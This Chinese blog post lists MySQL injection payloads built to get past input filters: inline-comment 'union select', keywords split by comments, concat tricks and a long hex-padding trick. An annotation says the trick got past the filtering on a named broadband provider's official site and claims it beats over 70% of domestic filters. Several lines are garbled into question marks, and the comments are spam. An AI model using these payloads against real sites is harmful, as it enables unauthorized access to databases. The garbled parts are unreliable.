mysql 注射绕过语法

/ 7评 / 0
id=-1+/*!uNioN*/+/*!SelEct*/+1,2,3,4--+
id=1/**/union/**/select/**/+1,2,3,4--+ 这个貌似没什么用。。
id=-1 and (select 1)=(select 0xAAA
AAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAA
AAAAAAA
AAAAAAAAAAAAAAAAAAAAAAA
AAA mores)+/*!union*/+/*!SeleCt*/
+1,2,3,4--+  应该是对特定的系统。。。 具体不怎么清楚
id=-1+concat(u,n,i,o,n)+concat(s,
e,l,e,c,t)+all+1,2,3,4--+  没测试过

id=-1+uni/**/on+Sel/**/Ect+1
,2,3,4--+

??????????????????????????????????

???????????????????????????????

?????????????????????????????????

????????????????????????????

?????????

r00t注释:

过滤union select的时候必备啊~ 这都看不懂 我也木办法了

用此语法绕过长城宽带官网

id=-1 and (select 1)=(select 
0xAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAA mores)+/*!union*/+/*!Sele
Ct*/+1,2,3,4--+

 

此语法秒杀国内70%以上过滤~

???????????????????????????????????

????????????????

????????????????????????????????

?????????????????????

???????????????????????????????

fr0m:007 Team

《 “mysql 注射绕过语法” 》 有 7 条评论

  1. instant loans说道:

    Instant Payday Loan…

    Emergency Payday Loans…

  2. 醉卧烟雨说道:

    @train quilt:{smile:13}

  3. s7ooL说道:

    @四川美女:你站美女很漂亮啊!{smile:41}

  4. 四川美女说道:

    没搞懂,咋样呢?

  5. train quilt说道:

    强悍!谢谢分享。{smile:17}

发表回复

您的电子邮箱地址不会被公开。 必填项已用 * 标注